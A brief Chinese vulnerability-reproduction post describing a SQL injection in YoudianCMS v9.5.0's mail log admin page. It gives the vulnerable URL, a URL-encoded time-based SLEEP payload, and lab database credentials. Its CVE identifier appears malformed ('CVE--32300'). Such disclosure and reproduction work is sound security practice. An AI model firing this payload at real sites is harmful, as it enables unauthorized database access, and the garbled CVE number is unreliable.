描述:
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。
通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。
数据库:root/root 数据库名:youdian
易受攻击的URL为:/index.php/Admin/mail/viewLog?MailSendID=1
%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))A)
参考文章:YoudianCMS v9.5.0 SQL 注入漏洞CVE--32300-Linux实验室
如果觉得《漏洞复现|youdiancms 9.5.0 版本 SQL注入 (CVE--32300)》对你有帮助,请点赞、收藏,并留下你的观点哦!